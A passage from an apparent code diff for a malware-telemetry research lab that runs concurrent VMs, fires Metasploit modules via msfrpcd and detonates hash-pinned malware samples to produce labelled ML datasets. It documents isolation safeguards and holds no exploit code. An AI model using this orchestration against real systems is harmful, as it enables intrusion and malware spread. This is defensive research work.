stop_event=self._stop,
)
def _guest_collector() -> None:
assert self.cfg.guest_agent_socket is not None
rows_holder["guest"] = guest_agent.run_loop(
socket_path=self.cfg.guest_agent_socket,
output_path=self.episode_dir / "telemetry-guest.jsonl",
t_mono_origin_ns=self._t_mono_origin_ns,
stop_event=self._stop,
)
def _perf_collector() -> None:
rows_holder["perf"] = perf_qemu.run_loop(
pid=self.cfg.target_pid,
output_path=self.episode_dir / "telemetry-perf.jsonl",
t_mono_origin_ns=self._t_mono_origin_ns,
interval_ms=self.cfg.perf_interval_ms,
stop_event=self._stop,
)
threads: list[threading.Thread] = []
threads.append(threading.Thread(target=_proc_collector, daemon=True, name="proc_qemu"))
if self.cfg.qmp_socket is not None:
threads.append(threading.Thread(target=_qmp_collector, daemon=True, name="qmp"))
if self.cfg.guest_agent_socket is not None:
threads.append(threading.Thread(target=_guest_collector, daemon=True, name="guest_agent"))
if self.cfg.enable_perf:
threads.append(threading.Thread(target=_perf_collector, daemon=True, name="perf"))
for t in threads:
t.start()
phases_observed: list[str] = []
try:
@ -121,21 +243,60 @@ class EpisodeRunner:
phases_observed = ["clean"]
self._stop.wait(timeout=self.cfg.duration_s)
finally:
self._stop.set()
t.join(timeout=2.0)
# Optional revert before stopping collectors so the
# transition shows up in their telemetry too — useful for
# building "snapshot revert" as a labeled phase later.
if self.cfg.revert_at_end and self.cfg.qmp_socket is not None:
try:
client = qmp.QMPClient(self.cfg.qmp_socket)
client.connect()
try:
out = client.loadvm(self.cfg.snapshot_name)
self.emit_event(
"snapshot_revert",
when="end",
snapshot=self.cfg.snapshot_name,
output=(out or "").strip()[:256],
)
finally:
client.close()
except Exception as e:
log.warning("loadvm at end failed: %s", e)
self.emit_event(
"snapshot_revert_failed",
when="end",
snapshot=self.cfg.snapshot_name,
error=str(e),
)
self._stop.set()
for t in threads:
t.join(timeout=3.0)
if pcap_handle is not None:
rc = pcap.stop_capture(pcap_handle)
self.emit_event("pcap_stopped", rc=rc,
pcap_bytes=pcap_path.stat().st_size if pcap_path.exists() else 0)
rows_holder["netflow"] = pcap.bucketize(
pcap_path, netflow_path,
bucket_ms=100,
t_mono_origin_ns=self._t_mono_origin_ns,
bridge_ip=self.cfg.bridge_ip,
)
end_mono_ns = time.monotonic_ns() - self._t_mono_origin_ns
pid_alive = _pid_alive(self.cfg.target_pid)
self._emit_event(
end_mono_ns,
"episode_end",
target_pid_alive=pid_alive,
)
self.emit_event("episode_end", target_pid_alive=pid_alive)
end_mono_ns = time.monotonic_ns() - self._t_mono_origin_ns
meta["ended_at_wall"] = datetime.now(timezone.utc).isoformat()
pcap_size = pcap_path.stat().st_size if pcap_path.exists() else 0
meta["result"] = {
"phases_observed": phases_observed,
"rows_proc": rows_holder["rows"],
"rows_proc": rows_holder["proc"],
"rows_qmp": rows_holder["qmp"],
"rows_guest": rows_holder["guest"],
"rows_perf": rows_holder["perf"],
"rows_netflow": rows_holder["netflow"],
"pcap_bytes": pcap_size,
"pid_alive_at_end": pid_alive,
"duration_observed_s": end_mono_ns / 1_000_000_000,
}
@ -143,16 +304,22 @@ class EpisodeRunner:
(self.episode_dir / "done.marker").touch()
log.info(
"episode %s complete: rows=%d duration=%.2fs phases=%s",
"episode %s complete: proc=%d qmp=%d guest=%d perf=%d netflow=%d pcap=%dB duration=%.2fs phases=%s",
self.episode_id,
rows_holder["rows"],
rows_holder["proc"], rows_holder["qmp"], rows_holder["guest"],
rows_holder["perf"], rows_holder["netflow"], pcap_size,
end_mono_ns / 1e9,
phases_observed,
)
return EpisodeResult(
episode_id=self.episode_id,
episode_dir=self.episode_dir,
rows_proc=rows_holder["rows"],
rows_proc=rows_holder["proc"],
rows_qmp=rows_holder["qmp"],
rows_guest=rows_holder["guest"],
rows_netflow=rows_holder["netflow"],
rows_perf=rows_holder["perf"],
pcap_bytes=pcap_size,
pid_disappeared=not pid_alive,
duration_observed_s=end_mono_ns / 1_000_000_000,
phases_observed=phases_observed,
@ -171,9 +338,7 @@ class EpisodeRunner:
break
t_mono = time.monotonic_ns() - self._t_mono_origin_ns
self._emit_label(t_mono, phase, prev=prev, reason="scheduled")
self._emit_event(
t_mono, "phase_transition", to=phase, prev=prev
)
self.emit_event("phase_transition", to=phase, prev=prev)
if self.on_phase is not None:
try:
self.on_phase(phase)
@ -185,6 +350,17 @@ class EpisodeRunner:
return observed
def _initial_meta(self, started_at_wall: str) -> dict:
sample_meta: dict | None = None
if self.cfg.sample is not None:
s = self.cfg.sample
sample_meta = {
"name": s.name,
"family": s.family,
"category": s.category,
"profile": s.profile,
"kind": s.kind,
"sha256": s.sha256,
}
return {
"episode_id": self.episode_id,
"schema_version": SCHEMA_VERSION,
@ -202,8 +378,8 @@ class EpisodeRunner:
"ram_mib": None,
"target_pid": self.cfg.target_pid,
},
"exploit": None,
"sample": None,
"exploit": self.cfg.exploit_meta,
"sample": sample_meta,
"schedule": {
"baseline_seconds": self.cfg.duration_s,
"interval_ms": self.cfg.interval_ms,
@ -220,7 +396,15 @@ class EpisodeRunner:
f.write("\n")
os.replace(tmp, path)
def _emit_event(self, t_mono_ns: int, event: str, **extra) -> None:
def emit_event(self, event: str, **extra) -> None:
"""Append a row to events.jsonl. Public so external drivers
(e.g. the MSF exploit driver) can stamp their own events with
the same monotonic clock the orchestrator is using."""
t_mono_ns = (
time.monotonic_ns() - self._t_mono_origin_ns
if self._t_mono_origin_ns
else 0
)
row = {
"t_mono_ns": t_mono_ns,
"t_wall_ns": time.time_ns(),

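The now-public `emit_event` stamps 0 until `run()` has set the monotonic origin, and an offset from that origin afterwards. The sketch below illustrates that behaviour with a hypothetical `MiniRunner`, which is not the real `EpisodeRunner`; the `start_clock` method and the `"event"` key in each row are assumptions made for the example, since the hunk above is cut off before the full row layout.

```python
import json
import tempfile
import time
from pathlib import Path


class MiniRunner:
    """Hypothetical, stripped-down stand-in for EpisodeRunner's event path."""

    def __init__(self, episode_dir: Path) -> None:
        self.episode_dir = episode_dir
        # Created up front so events can be written before the clock starts.
        self.episode_dir.mkdir(parents=True, exist_ok=True)
        self._t_mono_origin_ns = 0  # unset until the clock is started

    def start_clock(self) -> None:
        self._t_mono_origin_ns = time.monotonic_ns()

    def emit_event(self, event: str, **extra) -> None:
        # Before the clock starts, stamp 0; afterwards, stamp the offset from origin.
        t_mono_ns = (
            time.monotonic_ns() - self._t_mono_origin_ns
            if self._t_mono_origin_ns
            else 0
        )
        # The "event" key is an assumed field name for this illustration.
        row = {"t_mono_ns": t_mono_ns, "t_wall_ns": time.time_ns(), "event": event, **extra}
        with (self.episode_dir / "events.jsonl").open("a") as f:
            f.write(json.dumps(row) + "\n")


runner = MiniRunner(Path(tempfile.mkdtemp()) / "episodes" / "demo")
runner.emit_event("driver_setup", module="hypothetical/module")  # before the clock starts
runner.start_clock()
runner.emit_event("snapshot_load", snapshot="baseline")
lines = (runner.episode_dir / "events.jsonl").read_text().splitlines()
rows = [json.loads(line) for line in lines]
```

An external driver that writes a setup event before the schedule walks therefore gets `t_mono_ns == 0`, which keeps it ordered ahead of every in-run event.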
467
orchestrator/fleet.py Normal file

@ -0,0 +1,467 @@
"""Fleet runner — concurrent VM episodes with resource awareness.
The lab host detects its own capacity, picks how many VMs to run in
parallel without driving the box into swap or starving the host
itself, and runs that many episodes simultaneously. Each slot gets a
distinct ``Sample`` from the manifest (deterministically chosen by
host_id + slot index), so every concurrent VM produces novel,
labelable data.
Capacity heuristic (defaults documented inline so they're auditable):
cores_total = os.cpu_count()
cores_reserved = max(1, cores_total // 8) # host + collectors
ram_per_vm_mib = 320 # Alpine fits in 256
# but leave 64 for
# overhead (qemu+ovmf)
ram_headroom_mib = max(1024, ram_total // 8) # never starve host
max_by_cores = cores_total - cores_reserved
max_by_ram = (ram_available - ram_headroom) // ram_per_vm
max_by_load = max(1, max_by_cores // 2) if load_1m / cores > 0.75, else max_by_cores
The smallest of these wins. The reasoning string is logged + saved
into each episode's meta.json under ``fleet`` so post-hoc analysis
can correlate "this episode was run when 6 VMs were concurrent" with
its observed envelope.
"""
from __future__ import annotations
import logging
import os
import shutil
import signal
import subprocess
import threading
import time
from concurrent.futures import ThreadPoolExecutor, as_completed
from dataclasses import dataclass, field
from pathlib import Path
from exploits.modules import (
ModuleConfig, load_module_configs, module_target_port, select_module,
)
from samples.manifest import Sample, SampleManifest
log = logging.getLogger("cis490.fleet")
def _msfrpcd_available(host: str = "127.0.0.1", port: int = 55553) -> bool:
"""True when msfrpcd is listening — gate for the Tier-3 default.
A Tier-2 fallback runs when msfrpcd isn't there (still useful
data, just labeled with no-exploit so the trainer can filter)."""
import socket as _sk
try:
with _sk.create_connection((host, port), timeout=0.3):
return True
except OSError:
return False
@dataclass(frozen=True)
class FleetCapacity:
cores_total: int
cores_reserved: int
ram_total_mib: int
ram_available_mib: int
ram_per_vm_mib: int
ram_headroom_mib: int
load_1m: float
max_by_cores: int
max_by_ram: int
max_by_load: int
max_concurrent: int
rationale: str
def to_dict(self) -> dict:
return {
"cores_total": self.cores_total,
"cores_reserved": self.cores_reserved,
"ram_total_mib": self.ram_total_mib,
"ram_available_mib": self.ram_available_mib,
"ram_per_vm_mib": self.ram_per_vm_mib,
"ram_headroom_mib": self.ram_headroom_mib,
"load_1m": self.load_1m,
"max_by_cores": self.max_by_cores,
"max_by_ram": self.max_by_ram,
"max_by_load": self.max_by_load,
"max_concurrent": self.max_concurrent,
"rationale": self.rationale,
}
@dataclass
class FleetConfig:
host_id: str
repo_root: Path
data_root: Path
manifest: SampleManifest
# Module catalog for Tier-3 dispatch. Required for fleet-driven
# exploit-fire variety; empty catalog forces Tier-2 fallback.
modules: dict[str, ModuleConfig] = field(default_factory=dict)
# VM resource shape — must match what the launcher requests.
ram_per_vm_mib: int = 320
# Cap concurrency below the calculated max (e.g. for a smoke test).
max_concurrent_override: int | None = None
# Skip episodes whose sample requires a real binary that's not present.
require_real_samples: bool = False
# Force Tier-2 even when msfrpcd is up; used by tests + dev runs
# that want a no-exploit baseline.
force_tier2: bool = False
# msfrpcd connectivity (read by tier-3 driver via env).
msfrpcd_host: str = "127.0.0.1"
msfrpcd_port: int = 55553
def _read_meminfo() -> dict[str, int]:
out: dict[str, int] = {}
try:
with open("/proc/meminfo") as f:
for line in f:
k, _, rest = line.partition(":")
v = rest.strip()
if v.endswith(" kB"):
try:
out[k] = int(v[:-3]) * 1024
except ValueError:
pass
except OSError:
pass
return out
def _read_loadavg() -> float:
try:
with open("/proc/loadavg") as f:
return float(f.read().split()[0])
except (OSError, ValueError, IndexError):
return 0.0
def detect_capacity(*, ram_per_vm_mib: int = 320) -> FleetCapacity:
cores_total = os.cpu_count() or 1
# Reserve at least 1 core, more if the host has many.
cores_reserved = max(1, cores_total // 8)
mem = _read_meminfo()
ram_total_b = mem.get("MemTotal", 0)
ram_avail_b = mem.get("MemAvailable", ram_total_b)
ram_total_mib = ram_total_b // (1024 * 1024)
ram_available_mib = ram_avail_b // (1024 * 1024)
# Always leave the host at least 1 GiB, or 1/8 of total RAM if that is larger.
ram_headroom_mib = max(1024, ram_total_mib // 8)
load_1m = _read_loadavg()
max_by_cores = max(0, cores_total - cores_reserved)
if ram_per_vm_mib <= 0:
max_by_ram = max_by_cores
else:
max_by_ram = max(0, (ram_available_mib - ram_headroom_mib) // ram_per_vm_mib)
# Load-based cap: if the host is already busy, run fewer VMs.
if cores_total and load_1m / cores_total > 0.75:
# Halve, floor 1.
max_by_load = max(1, max_by_cores // 2)
else:
max_by_load = max_by_cores
candidates = [max_by_cores, max_by_ram, max_by_load]
max_concurrent = max(0, min(candidates))
binding = ["cores", "ram", "load"][candidates.index(max_concurrent)] \
if max_concurrent < max_by_cores else "cores"
rationale = (
f"cores_total={cores_total} reserved={cores_reserved} "
f"ram_avail_mib={ram_available_mib} headroom={ram_headroom_mib} "
f"per_vm={ram_per_vm_mib} load_1m={load_1m:.2f} "
f"-> max_concurrent={max_concurrent} (binding={binding})"
)
log.info("capacity: %s", rationale)
return FleetCapacity(
cores_total=cores_total,
cores_reserved=cores_reserved,
ram_total_mib=ram_total_mib,
ram_available_mib=ram_available_mib,
ram_per_vm_mib=ram_per_vm_mib,
ram_headroom_mib=ram_headroom_mib,
load_1m=load_1m,
max_by_cores=max_by_cores,
max_by_ram=max_by_ram,
max_by_load=max_by_load,
max_concurrent=max_concurrent,
rationale=rationale,
)
# ---------------------------------------------------------------------------
# Per-slot episode execution
# ---------------------------------------------------------------------------
@dataclass
class SlotResult:
slot: int
sample_name: str
sample_kind: str
episode_id: str | None
rc: int
duration_s: float
tier: str = "tier2" # "tier3" when an exploit fired
module_name: str | None = None # exploit module identifier (Tier 3 only)
error: str | None = None
extra: dict = field(default_factory=dict)
def _run_slot(
cfg: FleetConfig,
slot: int,
sample: Sample,
episode_index: int,
capacity: FleetCapacity,
) -> SlotResult:
"""Run one episode in a dedicated slot.
Dispatch:
- Tier 3 (default when msfrpcd is listening AND a module catalog
is populated): real exploit fire via run_tier3_demo.py with a
deterministically-selected module + sample.
- Tier 2 (fallback): no exploit; the controller drives a labeled
workload directly via the serial console. Recorded in
SlotResult.tier so trainers can filter the no-exploit episodes.
"""
# Per-slot run dir keeps QEMU sockets + pidfiles isolated. Without
# this, parallel slots rmtree each other's run dir mid-boot.
run_dir_base = "/tmp/cis490-vm-fleet"
# Decide tier.
bridge_iface = os.environ.get("BRIDGE") or None
# Filter the catalog to modules that can actually fire under the
    # current launcher mode. Reverse / bind shells require the host-
    # only bridge (no SLIRP+restrict=on guest egress), so skip those
    # when BRIDGE isn't set; otherwise the exploit fires but the
    # session never lands and the episode degenerates to a 30 s
    # session_open_timeout.
    if cfg.modules:
        if bridge_iface:
            usable_modules = dict(cfg.modules)
        else:
            usable_modules = {
                k: v for k, v in cfg.modules.items() if not v.requires_bridge
            }
    else:
        usable_modules = {}
    tier3_ready = (
        not cfg.force_tier2
        and bool(usable_modules)
        and _msfrpcd_available(cfg.msfrpcd_host, cfg.msfrpcd_port)
    )
    env = os.environ.copy()
    env["SLOT"] = str(slot)
    env["SAMPLE_NAME"] = sample.name
    env["SAMPLE_PROFILE"] = sample.profile
    env["SAMPLE_KIND"] = sample.kind
    env["FLEET_HOST_ID"] = cfg.host_id
    env["FLEET_EPISODE_INDEX"] = str(episode_index)
    env["FLEET_MAX_CONCURRENT"] = str(capacity.max_concurrent)
    venv_py = cfg.repo_root / ".venv" / "bin" / "python"
    py = str(venv_py) if venv_py.exists() else "python3"
    log_dir = cfg.data_root / "fleet-logs"
    log_dir.mkdir(parents=True, exist_ok=True)
    out_log = log_dir / f"slot-{slot}-ep-{episode_index}.log"
    if tier3_ready:
        module = select_module(
            usable_modules,
            host_id=cfg.host_id, slot=slot, episode_index=episode_index,
        )
        target_port = module_target_port(module) or 21
        # Per-slot runner dir for the target VM.
        run_dir = f"{run_dir_base}-target-{slot}"
        env["RUN_DIR"] = run_dir
        # Each slot gets a unique host-side hostfwd port so concurrent
        # targets don't collide on the loopback port.
        env["PORT_BASE"] = str(target_port + slot * 1000)
        if bridge_iface:
            env["BRIDGE"] = bridge_iface
        cmd = [
            py,
            str(cfg.repo_root / "tools" / "run_tier3_demo.py"),
            "--data-root", str(cfg.data_root),
            "--run-dir", run_dir,
            "--module", module.name,
            "--sample", sample.name,
            "--target-port", str(target_port + slot * 1000),
        ]
        tier = "tier3"
        module_name: str | None = module.name
    else:
        run_dir = f"{run_dir_base}-{slot}"
        env["RUN_DIR"] = run_dir
        cmd = [
            py,
            str(cfg.repo_root / "tools" / "run_real_vm_demo.py"),
            "--data-root", str(cfg.data_root),
            "--run-dir", run_dir,
            "--sample", sample.name,
        ]
        tier = "tier2"
        module_name = None
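        if not cfg.force_tier2 and not cfg.modules:
            log.warning("slot=%d falling back to Tier 2: empty module catalog", slot)
        elif not cfg.force_tier2 and not usable_modules:
            # The catalog is non-empty, but every module needs the bridge.
            log.warning(
                "slot=%d falling back to Tier 2: every module requires the bridge "
                "and BRIDGE is unset", slot,
            )
        elif not cfg.force_tier2:
            log.warning("slot=%d falling back to Tier 2: msfrpcd unreachable at %s:%d",
                        slot, cfg.msfrpcd_host, cfg.msfrpcd_port)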
    log.info(
        "slot=%d ep=%d tier=%s sample=%s module=%s run_dir=%s",
        slot, episode_index, tier, sample.name, module_name, run_dir,
    )
    started = time.monotonic()
    try:
        with out_log.open("ab") as logf:
            proc = subprocess.run(
                cmd,
                cwd=str(cfg.repo_root),
                env=env,
                stdout=logf,
                stderr=subprocess.STDOUT,
                check=False,
            )
        rc = proc.returncode
        err = None
    except (OSError, subprocess.SubprocessError) as e:
        rc = -1
        err = str(e)
    duration = time.monotonic() - started
    return SlotResult(
        slot=slot,
        sample_name=sample.name,
        sample_kind=sample.kind,
        episode_id=None,
        rc=rc,
        duration_s=duration,
        tier=tier,
        module_name=module_name,
        error=err,
    )
# ---------------------------------------------------------------------------
# FleetRunner
# ---------------------------------------------------------------------------


@dataclass
class FleetRunResult:
    capacity: FleetCapacity
    slots: list[SlotResult]
    total_duration_s: float


class FleetRunner:
    def __init__(self, cfg: FleetConfig) -> None:
        self.cfg = cfg
        self._stop = threading.Event()

    def stop(self) -> None:
        self._stop.set()

    def run(
        self,
        *,
        episodes: int = 1,
        episode_index_base: int = 0,
        capacity_override: FleetCapacity | None = None,
    ) -> FleetRunResult:
        capacity = capacity_override or detect_capacity(
            ram_per_vm_mib=self.cfg.ram_per_vm_mib,
        )
        n_slots = capacity.max_concurrent
        if self.cfg.max_concurrent_override is not None:
            n_slots = min(n_slots, self.cfg.max_concurrent_override)
        if n_slots <= 0:
            log.warning(
                "fleet capacity is zero (%s); cannot run", capacity.rationale,
            )
            return FleetRunResult(
                capacity=capacity, slots=[], total_duration_s=0.0,
            )
        log.info(
            "fleet host=%s slots=%d episodes=%d manifest_size=%d",
            self.cfg.host_id, n_slots, episodes, len(self.cfg.manifest),
        )
        all_results: list[SlotResult] = []
        t_start = time.monotonic()
        for ep in range(episodes):
            if self._stop.is_set():
                break
            episode_index = episode_index_base + ep
            slot_samples = [
                self.cfg.manifest.select(
                    host_id=self.cfg.host_id,
                    slot=slot,
                    episode_index=episode_index,
                )
                for slot in range(n_slots)
            ]
            if self.cfg.require_real_samples:
                slot_samples = [s for s in slot_samples if s.kind == "real"]
                if not slot_samples:
                    log.warning("require_real_samples: no real samples in manifest; skipping wave")
                    continue
            log.info(
                "wave %d/%d: %s",
                ep + 1, episodes,
                [(i, s.name, s.kind) for i, s in enumerate(slot_samples)],
            )
            with ThreadPoolExecutor(max_workers=n_slots) as pool:
                futures = [
                    pool.submit(
                        _run_slot, self.cfg, slot, sample, episode_index, capacity,
                    )
                    for slot, sample in enumerate(slot_samples)
                ]
                for fut in as_completed(futures):
                    res = fut.result()
                    log.info(
                        "slot %d sample=%s rc=%d duration=%.1fs",
                        res.slot, res.sample_name, res.rc, res.duration_s,
                    )
                    all_results.append(res)
        total = time.monotonic() - t_start
        return FleetRunResult(
            capacity=capacity,
            slots=all_results,
            total_duration_s=total,
        )
# ---------------------------------------------------------------------------
# Friendly capacity report (used by tools/run_fleet.py --capacity)
# ---------------------------------------------------------------------------


def capacity_report() -> str:
    c = detect_capacity()
    return (
        f"cores: {c.cores_total} (reserve {c.cores_reserved})\n"
        f"ram: {c.ram_total_mib} MiB total, {c.ram_available_mib} MiB available "
        f"(headroom {c.ram_headroom_mib} MiB, per-vm {c.ram_per_vm_mib} MiB)\n"
        f"load: 1m={c.load_1m:.2f}\n"
        f"caps: by_cores={c.max_by_cores}, by_ram={c.max_by_ram}, "
        f"by_load={c.max_by_load}\n"
        f"--> max_concurrent VMs: {c.max_concurrent}\n"
    )


@ -6,6 +6,7 @@ requires-python = ">=3.11"
dependencies = [
"starlette>=0.36",
"uvicorn[standard]>=0.27",
"msgpack>=1.0", # MSF RPC wire format for the Tier-3 exploit driver
]
[dependency-groups]


@ -2,6 +2,7 @@ from __future__ import annotations
import logging
import secrets
import time
from pathlib import Path
from typing import Awaitable, Callable
@ -17,6 +18,7 @@ log = logging.getLogger("cis490.receiver")
SUFFIX = ".tar.zst"
SCHEMA_VERSION = 1
def _bearer_check(request: Request, expected: str | None) -> Response | None:
@ -40,6 +42,23 @@ def make_app(
    async def health(request: Request) -> JSONResponse:
        return JSONResponse({"status": "ok"})

    async def ping(request: Request) -> JSONResponse:
        """Smoke-test endpoint. Verifies that the auth layer and the
        WG/Caddy/receiver pipe are alive end-to-end without persisting
        anything; index.jsonl is untouched. Used by ``cis490-shipper
        --ping`` during initial bring-up of a new lab host."""
        guard = _bearer_check(request, bearer_token)
        if guard is not None:
            return guard
        return JSONResponse(
            {
                "ok": True,
                "host_id": request.headers.get("x-lab-host"),
                "t_wall_ns": time.time_ns(),
                "schema_version": SCHEMA_VERSION,
            }
        )

    async def put_episode(request: Request) -> JSONResponse:
        guard = _bearer_check(request, bearer_token)
        if guard is not None:
@ -124,6 +143,7 @@ def make_app(
    routes = [
        Route("/v1/health", health, methods=["GET"]),
        Route("/v1/ping", ping, methods=["POST"]),
        Route(
            "/v1/episodes/{host_id}/{filename}",
            put_episode,


@ -1,33 +1,107 @@
# samples/
**Sample binaries are NEVER committed to this repo.** This directory holds:
Catalog of malware (or behaviour-matched mimics) the fleet draws from.
**Sample binaries are NEVER committed to this repo.**
- `manifest.yaml` — sha256-pinned list of samples to fetch, with metadata
(source, category, expected behavior, target CVE).
- `fetch.py` — script that pulls samples from configured sources
(MalwareBazaar, theZoo, vx-underground), verifies sha256, and stores them
under `samples/store/` (gitignored).
- Per-sample notes in markdown describing observed behavior in our lab.
## What's here
`samples/store/` lives only on the lab host. It is gitignored *and* should
sit on a disk that is not auto-mounted on developer workstations.
## Manifest entry shape (placeholder)
```yaml
samples:
- name: linux.miner.xmrig.elf
sha256: "..." # pinned
source: MalwareBazaar
category: miner
target_cve: null # cryptominers are usually post-exploit payloads
behavior: "high CPU, periodic stratum protocol traffic"
pairs_with_exploit: exploit/multi/samba/usermap_script
```
manifest.toml schema-checked catalog (loaded by samples/manifest.py)
manifest.py loader + per-(host_id, slot, ep) deterministic selection
store/ SHA-256-pinned binary content (gitignored — never commit)
.bazaar.token MalwareBazaar API key (mode 0600, gitignored)
```
## Manifest schema
Each entry in `manifest.toml`:
```toml
[[sample]]
name = "xmrig-cryptominer" # unique within manifest, DNS-safe
family = "XMRig" # canonical family label for ML
category = "cryptominer" # one of: cryptominer, botnet, ransomware,
# banking-trojan, fileless, rat, worm,
# loader, wiper, other
profile = "cpu-saturate" # behaviour profile from
# exploits/workloads.py — gates the
# in-session shell workload when no
# real binary is staged
description = "..."
# Optional — present iff this is a real binary the fetcher should pull:
sha256 = "abc123..."
source = "MalwareBazaar"
url = "https://bazaar.abuse.ch/sample/abc123/"
```
The loader rejects unknown categories and duplicate names. See
`tests/test_fleet.py` for the property tests covering selection
distribution + catalog walkability.
## "real" vs "mimic"
`Sample.kind` is **`"real"`** when `sha256` is set, otherwise **`"mimic"`**.
- **Mimic** — the orchestrator runs the matching profile-shaped shell
command (cpu-saturate / scan-and-dial / io-walk / bursty-c2 /
low-and-slow / shell-resident) inside the guest. No real binary
needed; useful right now for testing the dataset pipeline and as
the realistic-but-safe envelope class the trainer expects.
- **Real** — the orchestrator's Tier-3+ driver chunked-uploads
`samples/store/<sha256>` into the shell session, sha256-verifies on
the guest side, and execs it. Hash mismatch fail-stops the run; a
tampered binary is never executed.
`meta.sample.kind` lands in every episode's `meta.json`, so trainers
can stratify on it (the realistic-model path consumes only
`kind == "real"` episodes by default).
## Fetching a real binary
```sh
# 1. Register a (free) account at https://bazaar.abuse.ch and get the API key.
echo "<your-key>" > samples/.bazaar.token
chmod 0600 samples/.bazaar.token
# 2. Add an entry with sha256+source+url to manifest.toml.
# 3. Pull the binary into samples/store/<sha256>:
uv run python tools/fetch_sample.py <sha256>
```
Idempotent — re-running checks the staged copy's sha256 and skips the
download if it already matches.
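
The idempotency check can be pictured as follows. This is a sketch under assumptions, not the code in `tools/fetch_sample.py`: the function names are invented here, and the store layout (`<store>/<sha256>`) is taken from the description above.

```python
import hashlib
import tempfile
from pathlib import Path


def sha256_of(path: Path, chunk_size: int = 1 << 20) -> str:
    """Hash a file in chunks so large binaries never sit fully in memory."""
    digest = hashlib.sha256()
    with path.open("rb") as f:
        for chunk in iter(lambda: f.read(chunk_size), b""):
            digest.update(chunk)
    return digest.hexdigest()


def needs_download(store_root: Path, expected_sha256: str) -> bool:
    """True when nothing is staged, or the staged copy fails verification."""
    staged = store_root / expected_sha256
    if not staged.is_file():
        return True
    return sha256_of(staged) != expected_sha256.lower()


# Demonstration with harmless placeholder bytes in a throwaway directory.
with tempfile.TemporaryDirectory() as tmp:
    store = Path(tmp)
    payload = b"harmless placeholder bytes"
    digest = hashlib.sha256(payload).hexdigest()
    first_check = needs_download(store, digest)    # nothing staged yet
    (store / digest).write_bytes(payload)
    second_check = needs_download(store, digest)   # staged and matching
    (store / digest).write_bytes(b"tampered")
    third_check = needs_download(store, digest)    # staged but wrong

print(first_check, second_check, third_check)
```

Treating a mismatching staged copy the same as a missing one keeps the decision to a single boolean; a real fetcher may prefer to log the mismatch separately.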
## Per-(host, slot, episode) selection
`manifest.py::SampleManifest.select(host_id, slot, episode_index)`
hashes those three into a uniform integer and indexes the catalog.
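Two lab hosts on the same slot usually pick *different* samples (collision
probability ~1/N per pick). Picks are independent hash draws, not a
permutation, so a single host can repeat a sample before it has seen the
whole catalog; full coverage takes roughly N ln N picks in expectation.
No coordinator.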
## Safety rules
- Only download to the lab host, never to a developer workstation.
- Verify sha256 immediately, before any other read.
- Keep the directory on a path that is *not* on the WG overlay.
- Re-verify sha256 before each detonation; refuse to run on mismatch.
- **Only download to a lab host, never to a developer workstation.**
`samples/store/` lives only there, gitignored, on a disk that is
not auto-mounted elsewhere.
- The lab host's `br-malware` bridge is host-only by design (no NAT,
no route). Real malware running in the guest cannot call out unless
the operator explicitly opens egress, which we don't.
- Snapshot/revert (see `EpisodeConfig.revert_at_*` + `qmp.savevm`/
`loadvm`) means every fresh episode starts from a known-good
baseline regardless of what the previous one did to the guest.
- The fetcher verifies sha256 on download; the driver verifies again
in-guest before exec. Both layers must match the manifest.
## Adding a sample
1. Pick a `family` + `category` from the closed enum above.
2. Pick a `profile` from `exploits/workloads.all_profiles()`. If the
sample's behaviour doesn't match any of the six existing shapes,
add a new factory to `exploits/workloads.py` *first*, with tests.
3. (Real-only) Compute `sha256`, fetch via `tools/fetch_sample.py`,
verify the staged file's hash matches.
4. Append the entry to `manifest.toml`.
5. Run the test suite — the manifest loader's invariants catch typos.
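
Before appending an entry (step 4), the `name` can be checked against the "DNS-safe" requirement from the schema. This README does not define the term precisely, so the sketch assumes it means a single lowercase DNS label: letters, digits and hyphens, 1 to 63 characters, no leading or trailing hyphen. The helper name is hypothetical.

```python
import re

# Assumed reading of "DNS-safe": one lowercase label of 1..63 characters.
_DNS_LABEL = re.compile(r"[a-z0-9]([a-z0-9-]{0,61}[a-z0-9])?")


def is_dns_safe(name: str) -> bool:
    """True when the whole name is a single valid lowercase DNS label."""
    return _DNS_LABEL.fullmatch(name) is not None


for candidate in ("xmrig-cryptominer", "Mirai_Bot", "-leading-hyphen"):
    print(candidate, is_dns_safe(candidate))
```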

0
samples/__init__.py Normal file

113
samples/manifest.py Normal file

@ -0,0 +1,113 @@
"""Sample manifest loader + per-(host, slot) deterministic selection.

The manifest at ``samples/manifest.toml`` defines the catalog of
samples (real or mimic) the fleet draws from. Selection is
**deterministic** given ``(host_id, slot, episode_index)``, so two lab
hosts on the same fleet usually pick *different* samples for the same
slot index. Each pick is an independent hash draw rather than a
permutation, so a host can repeat a sample before it has covered the
whole catalog.

This gives us "all hosts on the network generating novel data" without
needing a coordinator: every host's ``host_id`` seeds its own
sample-rotation order, and the orderings spread across the catalog.
"""
from __future__ import annotations

import hashlib
import tomllib
from dataclasses import dataclass, field
from pathlib import Path

_VALID_CATEGORIES = {
    "cryptominer", "botnet", "ransomware", "banking-trojan",
    "fileless", "rat", "worm", "loader", "wiper", "other",
}


@dataclass(frozen=True)
class Sample:
    name: str
    family: str
    category: str
    profile: str
    description: str = ""
    source: str | None = None
    sha256: str | None = None
    url: str | None = None

    @property
    def kind(self) -> str:
        """``"real"`` if a sha256-pinned binary is expected, else ``"mimic"``.
        Trainers filter on this so the realistic-model pipeline only
        consumes real-malware episodes."""
        return "real" if self.sha256 else "mimic"

    def binary_path(self, store_root: Path) -> Path | None:
        """Resolved path of the staged binary, or None if this sample
        has no sha256 (mimic) or the binary hasn't been fetched yet."""
        if not self.sha256:
            return None
        p = Path(store_root) / self.sha256
        return p if p.exists() else None


@dataclass(frozen=True)
class SampleManifest:
    samples: list[Sample] = field(default_factory=list)

    def __len__(self) -> int:
        return len(self.samples)

    def select(self, *, host_id: str, slot: int, episode_index: int = 0) -> Sample:
        """Deterministic selection. The host_id mixes into the seed so
        different hosts visit the catalog in different orders; slot +
        episode_index tick within a host. Same inputs always give the
        same sample, which keeps runs replay-friendly for debugging."""
        if not self.samples:
            raise ValueError("manifest is empty")
        # SHA-256 of the seed gives a uniformly distributed integer.
        seed = f"{host_id}|{slot}|{episode_index}".encode()
        h = hashlib.sha256(seed).digest()
        idx = int.from_bytes(h[:8], "big") % len(self.samples)
        return self.samples[idx]

    @classmethod
    def load(cls, path: str | Path) -> "SampleManifest":
        with open(path, "rb") as f:
            data = tomllib.load(f)
        raw = data.get("sample") or []
        if not isinstance(raw, list):
            raise ValueError(f"{path}: 'sample' must be an array of tables")
        samples: list[Sample] = []
        for i, entry in enumerate(raw):
            if not isinstance(entry, dict):
                raise ValueError(f"{path}: sample[{i}] is not a table")
            for key in ("name", "family", "category", "profile"):
                if not isinstance(entry.get(key), str) or not entry[key]:
